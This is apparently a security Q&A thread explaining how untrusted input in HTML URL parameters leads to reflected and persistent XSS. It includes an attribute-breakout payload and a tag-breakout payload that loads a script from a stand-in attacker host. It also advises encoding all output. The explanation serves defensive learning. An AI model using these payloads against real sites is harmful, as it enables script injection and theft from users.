The OWASP XSS Prevention Worksheet recommends "URL escape before inserting untrusted data into HTML URL parameter values".

I don't understand how someone could break out of a URL context or inject a new subcontext to perform a XSS attack in a URL. As the browser interprets the URL, can certain characters be used to terminate the processing of the URL and force the browser to start processing a new injected URL?

http://somesite.com/about<terminating character>javascript:;alert("hello")

Can someone please provide examples of how someone would perform an XSS injection in a URL?

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2 Answers2


The issue is if you accept user input as part of the url you output, as in this example given by OWASP:

<a href="http://www.somesite.com?test=[user input]">link</a >  

The attacker does not have to break out of the URL context, but out of the string, eg by injecting:

foo" onload="evilJS();" foo="bar

or to break out of the a tag as well:

"><script src="evil.attacker/script.js"></script>
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This is a classic attack called "reflected XSS", and can also be used for "Persistent XSS". If you do not encode parameters being sent to your web application, they may "reflected" back out into the html body and executed as javascript. As a rule, encode absolutely everything. All tags that could be used to produce XSS must be encoded before being shown in the application (such as the <> in this case.) What can be worse (in the persistent case), is when the XSS is saved into your application and recalled via database.

Many web frameworks do not do this by default.

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  • injections into URLs can also be as part of a persistent XSS attack (for example on a profile displaying a homepage of that user). A special case would be something like `PHP_SELF`, which is quite often used uncleaned and can then be used for reflected XSS – tim Feb 23 '15 at 14:51